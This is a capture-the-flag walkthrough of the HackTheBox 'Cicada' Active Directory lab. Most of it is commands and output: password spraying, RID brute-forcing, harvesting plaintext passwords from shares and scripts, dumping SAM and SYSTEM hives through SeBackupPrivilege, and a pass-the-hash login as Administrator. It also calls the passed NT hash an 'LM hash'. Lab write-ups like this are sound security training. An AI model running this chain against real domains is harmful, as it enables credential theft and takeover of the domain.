Cicada
Easy Windows Active Directory Box

Reconnaissance
As always we start off by performing a port scan to enumerate services and versions running on the target using Nmap
nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.043s latency).
Not shown: 65522 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-02 19:43:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
51785/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-02T19:44:39
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 2 13:45:19 2025 -- 1 IP address (1 host up) scanned in 122.75 seconds
We can notice we're facing a DC (Domain Controller) Because of the simultaneously open ports like TCP 88 (Kerberos)
| TCP 389 (LDAP)
| TCP 5985 (WinRM)
... which is common for DCs, we can also see the virtual host which is cicada.htb and CICADA-DC.cicada.htb so let's add them to our /etc/hosts
file
We already know that following a good methodology is the most important on a pentest therefore we will need to enumerate every single thing that may contain useful information
so let's start by enumerating the open TCP Pport 53 (DNS)
using dig
dig @10.10.11.35 cicada.htb NS
...
dig @10.10.11.35 cicada.htb MX
...
dig @10.10.11.35 cicada.htb TXT
...
dig @10.10.11.35 cicada.htb AXFR
...
This time the records didn't contain anything useful so let's move on to enumerate the TCP Port 88
(Kerberos) using the Kerbrute tool to try and enumerate possible users:
kerbrute userenum --dc 10.10.11.35 -d cicada.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/02/25 - Ronnie Flathers @ropnop
2025/08/02 14:53:00 > Using KDC(s):
2025/08/02 14:53:00 > 10.10.11.35:88
2025/08/02 14:53:03 > [+] VALID USERNAME: guest@cicada.htb
2025/08/02 14:53:08 > [+] VALID USERNAME: administrator@cicada.htb
We see that the user Guest
is available so it will help us with further enumeration using NULL sessions
Now let's enumerate the TCP Port 135 (RPC) using the tool rpcclient
with the use of a NULL session
rpcclient -U "Guest" 10.10.11.35
Password for [WORKGROUP\Guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
We also didn't extract any information there so let's continue our reconnaissance
Let's try and enumerate TCP Port 445 (SMB) with the use of Netexec
(Newer version of CrackMapExec
)
netexec smb 10.10.11.35 -u 'guest' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
The HR (Human Resources?) share seems interesting, so let's check it using smbcient
smbclient -U 'guest' //10.10.11.35/HR
And we see it contains a file called Notice from HR.txt
with this information:
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
And we finally found a password! — Cicada$M6Corpb*@Lp#nZp!8
After prforming a password spray with Kerbrute we see it doesnt work with any user
kerbrute passwordspray --verbose -d cicada.htb --dc 10.10.11.35 users.txt 'Cicada$M6Corpb*@Lp#nZp!8'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/02/25 - Ronnie Flathers @ropnop
2025/08/02 15:16:29 > Using KDC(s):
2025/08/02 15:16:29 > 10.10.11.35:88
2025/08/02 15:16:29 > [!] Guest@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2025/08/02 15:16:29 > [!] krbtgt@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - USER LOCKED OUT
2025/08/02 15:16:29 > [!] john.smoulder@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] emily.oscars@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] Administrator@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] michael.wrightson@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] sarah.dantelia@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] david.orelious@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > [!] CICADA-DC$@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 > Done! Tested 9 logins (0 successes) in 0.101 seconds
RID Brute-Force
As we didn't get any username let's try to enumerate usernames using a RID Brute-Force
with netexec
netexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep "(SidTypeUser)"
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1601: CICADA\emily.oscars (SidTypeUser)
And finally, we found valid usernames, so let's add them into a user.txt
file to further attacks
Further Enumeration
Some AD users don’t have Kerberos pre-authentication enabled. That means we can request a TGT for them without a password, and the KDC
will send back a hash we can crack offline.
So we already have valid usernames — now we’re checking which ones are AS-REP Roastable
impacket-GetNPUsers cicada.htb/ -no-pass -usersfile users.txt -format john
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User CICADA-DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User john.smoulder doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sarah.dantelia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User michael.wrightson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User david.orelious doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User emily.oscars doesn't have UF_DONT_REQUIRE_PREAUTH set
But we see none of them are AS-REP Roastable
either
Let's See if we can access through SMB
trying the found password with every user using Netexec
again
netexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
[*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
-------- SNIP -----------
[+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp #nZp!8
-Username- -Last PW Set- -BadPW- -Description-
Administrator 2024-08-26 20:08:03 9 Built-in account for administering the computer/domain
Guest 2024-08-28 17:26:56 1 Built-in account for guest access to the computer/domain
krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account
john.smoulder 2024-03-14 12:17:29 9
sarah.dantelia 2024-03-14 12:17:29 9
michael.wrightson 2024-03-14 12:17:29 0
david.orelious 2024-03-14 12:17:29 8 Just in case I forget my password is aRt$Lp#7t*VQ!3
emily.oscars 2024-08-22 21:20:17 8
[*] Enumerated 8 local users: CICADA
And we see it works for the user michael.wrightson
and we found something interesting too, what seems to be the password for the user david.orelious
— aRt$Lp#7t*VQ!3
Let's try and enumerate the shares too using both of these credentials we found
netexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
-------- SNIP -----------
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
netexec smb 10.10.11.35 -u users.txt -p 'aRt$Lp#7t*VQ!3' --shares
-------- SNIP -----------
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
We can see david.orelious has access to a new interesting share called DEV
so let's enumerate it using smbclient
as we did before
smbclient -U 'david.orelious' //10.10.11.35/DEV
And we found a script called Backup_Script.ps1 so let's see what's inside it
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
And we found the password for emily.oscars
— Q!3@Lp#M6b*7t*Vt
!!
Logging into the WinRM Service
Using these credentials we can successfully login into the WinRM
service using evil-winrm
evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.7
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
And we're in!!
Using whoami /priv we find some misconfigurations:
Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
The one we're going to approach is the SeBackupPrivilege
Dumping SAM and System
It lets us read sensitive system files, even ones protected by the OS, so let's create a Temp
directory under C:\
Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> mkdir C:\Temp
Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd C:\Temp
We can use this to dump the SAM
and SYSTEM
hives, which contain password hashes.
*Evil-WinRM* PS C:\Temp> reg save hklm\sam C:\Temp\sam.hive
*Evil-WinRM* PS C:\Temp> reg save hklm\system C:\Temp\system.hive
Then we can download these files into our attacker system with the Evil-WinRM
download
function, and finally dump them using impacket-secretsdump
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
And then we can just do a Pass-The-Hash
using Evil-WinRM
with the obtained Administrator LM hash
evil-winrm -i 10.10.11.35 -u administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
691c7231cdead497e605a022382efcb8
And there's the root flag, overall one of my favourite Active Directory HackTheBox
boxes because of how much you need to enumerate and how it tests your recon skills.
Hope this helped you, thank you for reading and see you next time!!
Last updated